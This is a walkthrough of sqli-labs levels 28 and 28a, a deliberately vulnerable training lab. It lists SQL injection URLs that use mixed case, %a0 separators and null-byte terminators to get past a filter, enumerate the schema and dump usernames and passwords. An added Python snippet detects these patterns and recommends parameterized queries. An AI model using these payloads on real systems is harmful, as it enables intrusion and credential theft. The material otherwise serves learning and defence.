sqli-labs (less-28 and less-28a)
less-28
Open level 28, enter id=1, and view the source code. It is basically the same as level 27, so mixed case is still used to bypass the filtering.
http://127.0.0.1/sql1/Less-28/?id=1' # an error is echoed
http://127.0.0.1/sql1/Less-28/?id=1');%00 # displays normally
From this, the closing sequence is ');%00 and the injection is character (string) type.
Determine the echo position
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00
View the current database
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00
View all tables in the security database
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00
View all columns in the users table
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00
View the values of the username and password fields
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00
less-28a
http://127.0.0.1/sql1/Less-28a/?id=1' # an error is echoed
http://127.0.0.1/sql1/Less-28a/?id=1');%00 # displays normally
The closing sequence is ');%00 and the injection is character (string) type.
The remaining steps are not repeated here; they are exactly the same as in less-28. This level also uses mixed case to bypass the WAF.
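The requests above as they would appear to a log reviewer, in an added example that is not part of the original post or of sqli-labs: a case-sensitive keyword rule misses them, while decoding and normalizing the id parameter first exposes the mixed case, the %a0 separators and the %00 terminator. The function names and rule labels are hypothetical, and the benign request is constructed.

```python
import re
from urllib.parse import unquote

# Requests copied from the walkthrough, plus one constructed benign request.
SAMPLE_REQUESTS = [
    "http://127.0.0.1/sql1/Less-28/?id=1",  # constructed benign request
    "http://127.0.0.1/sql1/Less-28/?id=1');%00",
    "http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00",
    "http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,"
    "(select (group_concat(table_name)) from (information_schema.tables) "
    "where (table_schema='security'));%00",
]

def decode_param(url, name="id"):
    """Return the percent-decoded value of one query parameter.
    latin-1 keeps %a0 and %00 as single characters (0xA0, 0x00)."""
    for pair in url.partition("?")[2].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value, encoding="latin-1")
    return ""

def naive_match(url):
    """Case-sensitive keyword rule on the raw URL (the kind mixed case defeats)."""
    return re.search(r"union\s+select", url) is not None

def findings(url):
    """Inspect the decoded value, then a case-folded, whitespace-collapsed copy."""
    value = decode_param(url)
    norm = re.sub(r"[\s\xa0\x00]+", " ", value).casefold()
    hits = []
    if "\x00" in value:
        hits.append("null-byte")
    if "\xa0" in value:
        hits.append("nbsp-separator")
    if re.search(r"\bunion (all )?select\b", norm):
        hits.append("union-select")
    if "information_schema" in norm:
        hits.append("schema-enumeration")
    return hits

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(naive_match(url), findings(url), url[:60])
```

Rules like these help with triage only; the fix for both levels is to bind id as a query parameter instead of concatenating it into the SQL string.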